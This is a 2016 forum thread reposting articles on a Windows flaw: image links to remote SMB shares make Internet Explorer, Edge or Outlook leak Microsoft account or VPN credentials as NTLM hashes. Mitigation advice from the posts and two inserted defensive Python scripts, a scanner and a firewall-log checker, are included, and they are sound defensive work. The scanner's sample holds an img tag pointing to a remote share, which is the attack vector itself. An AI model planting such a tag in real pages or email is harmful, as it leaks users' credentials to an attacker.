Batu69
Posted August 2, 2016

Attack from the '90s resurfaces more deadly than before

All the accounts a hacker could own via this exploit

A flaw in how Windows handles old authentication procedures for shared network resources can leak a user's Microsoft account username and password, or VPN credentials if the user is using a VPN to surf the Internet.

The exploit relies on an attacker embedding a link to an SMB resource (network share) inside a Web page or an email that gets viewed via Outlook. The attacker can disguise the link to his network share inside image tags, but instead of the proper image link, he can place the link to a network share hosted on his own network.

Attack works via IE, Edge, or Outlook

When a user accesses the link via Internet Explorer, Edge, or Outlook, because of the way Windows handles authentication for network shares, the user's computer will automatically send the user's login credentials to authenticate on the crook's domain, even via the Internet.

While the Microsoft account password is not leaked in cleartext, but as an NTLM hash, researchers have proved a long time ago that these hashes can be easily cracked.

This isn't even something new, since Microsoft and the researcher community have known about this issue since 1997, and often discussed it at security conferences such as Black Hat.

While this wasn't a problem in the past since Windows accounts were using machine-localized usernames and passwords, beginning with Windows 8 and onward Microsoft started to allow users to authenticate on their computers with Microsoft accounts. In Windows 10, this became the de-facto standard authentication method, meaning more users started using it.

Attack can indirectly leak data for many other Microsoft resources

In recent years, Microsoft started linking all its online realties with the user's same Microsoft account.

According to ValdikSS from ProstoVPN, this old attack now has new claws, allowing a crook to get his hands on credentials for Microsoft accounts that will indirectly also grant him access to all sorts of services like Skype, Xbox, OneDrive, Office 360, MSN, Bing, Azure and more.

Even worse, if the user is utilizing a VPN connection to load the corrupt SMB resource, then his VPN credentials get leaked instead, allowing the crook to access the victim's VPN account.

ValdikSS says the easiest way to protect oneself against such attacks is to block all outgoing SMB connections (port 445) via the Windows firewall, except for local networks.

But the best defense against this attack is not to use your Microsoft account to log into your Windows PC.

Proof-of-concept page showing the attack in action

Article source

Click here to open the demo site.

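For defenders, the delivery vector described in the post above (a network-share path placed where an image link belongs) can be screened for at a mail gateway or web proxy. The following is an added example, not code from the article or from ValdikSS; the function names, the attribute list and the sample message are constructed here, and treating single-label host names as intranet hosts is an assumption.

```python
import ipaddress
import re
from html.parser import HTMLParser

FETCH_ATTRS = {"src", "href", "background", "data", "poster"}  # attributes a renderer may load
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
# \\host\share\..., file://host/share/... or file:////host/share/...
# (file:///C:/... has no host and is not matched)
SHARE_RE = re.compile(r"^(?:\\\\|file:(?:////|//))([^\\/]+)[\\/]", re.I)

def smb_host(value):
    """Return the host a reference would contact as a network share, or None."""
    m = SHARE_RE.match(value.strip())
    return m.group(1).lower() if m else None

def is_local(host):
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "." not in host        # assumption: single-label names are intranet hosts
    return any(addr in net for net in LOCAL_NETS)

class ShareRefFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []            # (tag, attribute, host)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            host = smb_host(value) if name in FETCH_ATTRS and value else None
            if host and not is_local(host):
                self.findings.append((tag, name, host))

def find_remote_share_refs(html):
    """List embedded references that would make the client contact a non-local share."""
    finder = ShareRefFinder()
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample message body; the addresses are documentation ranges.
SAMPLE = r'''<p>Quarterly report attached.</p>
<img src="\\203.0.113.7\share\pixel.png" width="1" height="1">
<img src="file://files.example.net/pub/logo.png">
<img src="\\fileserver\team\banner.png">
<img src="//cdn.example.com/site.png">
<img src="\\192.168.1.10\scans\a.png">'''

if __name__ == "__main__":
    for finding in find_remote_share_refs(SAMPLE):
        print(finding)
```

Protocol-relative URLs such as `//cdn.example.com/site.png` are ordinary web references and are deliberately not flagged; only backslash UNC paths and `file:` URLs with a host are.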
steven36
Posted August 2, 2016

5 minutes ago, Batu69 said:
Attack works via IE, Edge, or Outlook

12 minutes ago, Batu69 said:
But the best defense against this attack is not to use your Microsoft account to log into your Windows PC.

=

oliverjia
Posted August 2, 2016

I guess "flaws" like this are the reasons why I never used a MS account in all my PCs. Local account only. Cloud is the best way for hackers to get your credentials, for sure. In the computer world, more convenience = less security. Remember that.

mona
Posted August 2, 2016

Quote:
community has known about this issue since 1997,

zigzag
Posted August 2, 2016

They take back onedrive storage from regular users. They want cloud computing. What a joke. Now you can feel the power of Windows 10. You are more secure than ever.

SPECTRUM
Posted August 2, 2016

I use local account, never trust in cloud accounts.

vitorio
Posted August 2, 2016

I do not see there google drive.

Petrovic
Posted August 2, 2016

What would you say if I told you that an almost two decade old vulnerability in Windows may leak your Microsoft Account credentials when you visit a website, read an email, or use VPN over IPSec?

A bug that goes all the way back to Windows 95 is causing major issues on Windows 8 and Windows 10.

Basically, what happens is the following: Microsoft Edge, Internet Explorer, Outlook and other Microsoft products allow connections to local network shares. What the default settings don't prevent on top of that is connections to remote shares.

An attacker could exploit this by creating a website or email with an embedded image or other content that is being loaded from a network share.

Microsoft products like Edge, Outlook or Internet Explorer try to load the network share resource, and send the active user's Windows login credentials, username and password to that network share.

The username is submitted in plaintext, the password as an NTLMv2 hash.

Microsoft Account Credentials Leak vulnerability

There are two main issues that arise from that. First, the account data is exposed to third parties which may try cracking the hash to recover the user password.

Second, since account information leaks, it may very well be a privacy issue especially if Tor or VPN services are used to improve privacy while on the Internet.

The reason why the attack is more promising under Windows 8 and newer is that Microsoft accounts are the default sign in option on those systems. This means that Microsoft account credentials are leaked to the network share, and not a local username and password.

A proof of concept web page is available which will test the underlying system to find out whether it is vulnerable or not. Please note that a successful attack will submit the Windows username and password to a third-party site. Click here to open the demo site.

Mitigation

The best course of action is to use third-party products instead of Microsoft products for the time being. While this may work in some situations, it won't in others. The researchers who discovered the issue suggest configuring Windows Firewall in this case to protect against these attacks.

"In addition to network perimeter firewalls, we therefore advocate for a host based hardening thanks to the Windows Firewall present in any Windows machine running at least Windows XP SP2. By enforcing egress filtering on ports 137/138/139/445 and dropping any IP packet leaving the host with a destination matching any of those ports and having a public IP as a target host, we offer a more consistent protection against those attacks."

Also, make sure that the password strength is sufficient to make brute force attacks less of an issue.

Article source

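To check whether the egress filtering quoted in the post above is actually in force on a host, the firewall's connection log can be searched for NetBIOS/SMB traffic that left for a public address. The following is an added example, not code from the researchers or the article; the function names are chosen here, and the log lines are constructed in the space-separated layout of a Windows Firewall log with a `#Fields:` header, using documentation addresses.

```python
import ipaddress

SMB_PORTS = {"137", "138", "139", "445"}      # ports named in the quoted mitigation
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

def is_public(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in LOCAL_NETS)

def smb_egress_events(log_text):
    """Return outbound records to ports 137/138/139/445 whose destination is a public IP."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]         # column names come from the log itself
            continue
        if not line.strip() or line.startswith("#") or not fields:
            continue
        rec = dict(zip(fields, line.split()))
        if rec.get("path", "SEND") != "SEND":  # ignore inbound records
            continue
        if rec.get("dst-port") in SMB_PORTS and is_public(rec["dst-ip"]):
            hits.append(rec)
    return hits

def allowed_smb_egress(log_text):
    """Records the filter did not stop: allowed SMB/NetBIOS traffic to a public address."""
    return [(r["time"], r["protocol"], r["dst-ip"], r["dst-port"])
            for r in smb_egress_events(log_text) if r["action"] == "ALLOW"]

# Constructed log excerpt for illustration.
SAMPLE_LOG = """\
#Version: 1.5
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path

2016-08-02 10:15:01 ALLOW TCP 192.168.1.20 192.168.1.5 49710 445 0 - 0 0 0 - - - SEND
2016-08-02 10:15:07 ALLOW TCP 192.168.1.20 203.0.113.7 49712 445 0 - 0 0 0 - - - SEND
2016-08-02 10:15:09 DROP TCP 192.168.1.20 198.51.100.9 49713 139 0 - 0 0 0 - - - SEND
2016-08-02 10:15:11 ALLOW UDP 192.168.1.20 203.0.113.7 137 137 0 - - - - - - - SEND
2016-08-02 10:15:12 ALLOW TCP 192.168.1.20 203.0.113.7 49714 443 0 - 0 0 0 - - - SEND
2016-08-02 10:15:13 ALLOW TCP 203.0.113.7 192.168.1.20 50000 445 0 - 0 0 0 - - - RECEIVE
"""

if __name__ == "__main__":
    for event in allowed_smb_egress(SAMPLE_LOG):
        print("not filtered:", event)
```

Any `ALLOW` record returned here means the host could still reach a share on the Internet; `DROP` records for the same ports show the filter working.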
Batu69 (Author)
Posted August 2, 2016

Topic has been merged.

Archived
This topic is now archived and is closed to further replies.